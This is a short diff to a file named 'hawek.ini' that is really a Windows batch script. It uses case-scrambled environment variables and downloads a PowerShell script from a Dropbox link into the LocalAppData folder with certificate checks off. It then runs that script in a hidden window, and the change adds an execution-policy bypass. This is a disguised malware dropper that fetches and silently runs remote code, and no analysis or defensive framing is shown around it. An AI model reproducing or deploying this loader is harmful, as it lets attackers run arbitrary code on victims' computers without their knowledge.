--- a/hawek.ini
+++ b/hawek.ini
@@ -4,6 +4,6 @@ pushd "%loCAlaPpDaTA%"
 pushd "%uSErpROfiLE%"
 curl -k -L "https://www.dropbox.com/scl/fi/jpb7149q4d4qnl9jipohg/help.ini?rlkey=1g5k56utmg7qeybwph9nxvd6n&st=l9r59yyp&dl=1" -o %loCAlaPpDaTA%\Eudksref.ps1
 timeout -t 7 /nobreak
-powershell.exe -WindowStyle Hidden -file %loCAlaPpDaTA%\Eudksref.ps1
+powershell.exe -ep bypass -WindowStyle Hidden -file %loCAlaPpDaTA%\Eudksref.ps1
 timeout -t 3 /nobreak
 exit
